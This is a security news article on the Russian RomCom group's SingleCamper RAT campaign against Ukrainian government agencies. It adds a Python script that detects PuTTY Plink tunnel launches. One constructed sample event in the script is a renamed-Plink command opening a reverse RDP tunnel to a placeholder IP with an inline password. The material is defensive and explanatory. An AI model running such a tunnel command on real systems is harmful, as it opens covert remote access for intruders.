

Ukrainian Government Targeted With Russian RomCom Attacks

by Wajahat Raza

October 31, 2024 - TuxCare expert team

According to recent media reports, Ukrainian government agencies have experienced a new wave of Russian RomCom attacks. The threat actor behind them uses a remote access trojan (RAT) for purposes such as extortion and credential theft. In this article, we look at the attack and the methods used to carry it out. Let’s begin!

RomCom Attacks On Government Agencies

These RomCom attacks are tracked by Cisco Talos under the activity cluster UAT-5647. Reports state that RomCom, a Russian threat actor, uses the SingleCamper RAT for this campaign. The RAT is also referred to as SnipBot or RomCom 5.0.

Commenting on the new wave of UAT-5647 espionage activities, cybersecurity experts Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura have stated that: 

“This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader”

RomCom Threat Actor Activities

Before we go into further detail, it’s worth noting that the RomCom threat actor is also tracked as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu. Activity attributed to this actor has increased in recent months. A key objective of the RomCom attacks is to establish long-term persistence and exfiltrate data.

The threat actor is also believed to be expanding its attack infrastructure with malware components written in several programming languages. The languages and the components built in each are:

Programming Language | Attack Component
C++                  | ShadyHammock, MeltingClaw
Rust                 | DustyHammock, RustyClaw
Go                   | GLUEEGG
Lua                  | DROPCLUE

SingleCamper Malware Attack Chain

The RomCom threat actor sends spear-phishing messages carrying a downloader written in C++ or Rust. This downloader deploys the ShadyHammock and DustyHammock backdoors.

DustyHammock contacts the command-and-control (C2) server, executes arbitrary commands, and downloads files from the server. ShadyHammock, on the other hand, launches the SingleCamper RAT, which then carries out a range of malicious activities, including:

  • Data exfiltration.
  • Lateral movement.
  • Network reconnaissance.
  • User and system discovery.
  • Downloading PuTTY’s Plink tool for establishing remote tunnels.
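The last item in that list, Plink being pulled down to build a tunnel, is one of the few steps in the chain that leaves a distinctive process-creation trace a defender can alert on. The script below is an added example written for this article, not code from TuxCare or from Cisco Talos. It scans Sysmon-style process-creation records (the field names Image, OriginalFileName, CommandLine and ParentImage are assumed) for a Plink launch whose command line requests port forwarding, and it also recognises a copy that has been renamed on disk by checking the name embedded in the executable’s version resource. The events it runs over are constructed samples, not telemetry from the reported intrusion.

```python
"""Flag PuTTY Plink launches that set up a tunnel, the final step of the
SingleCamper chain described above. Added example, not code from the
article or from Cisco Talos. Field names are assumed Sysmon-style keys;
the events at the bottom are constructed, not real telemetry."""
from typing import Dict, Iterable, List

# Real plink switches that set up forwarding or a shell-less session:
# -R remote (reverse) forward, -L local forward, -N run no remote command,
# -pw password supplied on the command line.
TUNNEL_FLAGS = {"-R", "-L", "-N", "-pw"}


def is_plink(event: Dict[str, str]) -> bool:
    """Recognise Plink by its on-disk path or by the original file name
    embedded in the PE version resource, so a renamed copy is still caught."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("plink.exe") or original.startswith("plink")


def tunnel_flags(command_line: str) -> List[str]:
    """Return the forwarding-related switches present, sorted for stable output."""
    tokens = set(command_line.split())
    return sorted(t for t in tokens if t in TUNNEL_FLAGS)


def suspicious_plink_events(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """One finding per Plink launch whose command line requests a tunnel.
    A plain 'plink -V' (version check) produces no finding."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        if not is_plink(ev):
            continue
        flags = tunnel_flags(ev.get("CommandLine", ""))
        if not flags:
            continue
        image = ev.get("Image", "")
        findings.append({
            "image": image,
            "parent": ev.get("ParentImage", ""),
            "flags": flags,
            # A tunnel built by a binary no longer named plink.exe deserves a
            # higher severity than an administrator's PuTTY install would.
            "renamed": not image.lower().endswith("plink.exe"),
            "password_on_cmdline": "-pw" in flags,
        })
    return findings


# Constructed sample events (documentation IP range, invented paths).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Plink renamed to look like a system binary, started by an unknown dropper.
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "Plink",
     "CommandLine": r"C:\Users\Public\svchost.exe -ssh -N -R 8443:127.0.0.1:3389 user@198.51.100.7 -pw p4ss",
     "ParentImage": r"C:\Users\Public\update.exe"},
    # Legitimate install, version check only: no forwarding, no finding.
    {"Image": r"C:\Program Files\PuTTY\plink.exe", "OriginalFileName": "Plink",
     "CommandLine": r'"C:\Program Files\PuTTY\plink.exe" -V',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for finding in suspicious_plink_events(SAMPLE_EVENTS):
        print(finding)
```

Matching on OriginalFileName is the part that matters in practice: the path and file name are under the attacker’s control, while the version-resource name travels with the binary. Pairing the hit with its parent process, as the findings do, lets an analyst separate an administrator running PuTTY from a tunnel spawned by an unrecognised executable.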

Commenting on these attack tactics, cybersecurity experts have stated: 

“This specific series of attacks, targeting high profile Ukrainian entities, is likely meant to serve UAT-5647’s two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise.”

Conclusion

The RomCom attacks on Ukrainian government agencies highlight the growing sophistication of Russian cyber-espionage tactics. By leveraging the SingleCamper RAT and various malware components, the threat actors aim to establish long-term persistence, exfiltrate sensitive data, and potentially deploy ransomware for financial gain.

Cyberattacks of this kind are growing more complex, and such a threat landscape calls for robust security measures that reduce risk and improve overall security posture.

The sources for this piece include articles in The Hacker News and BackBox.
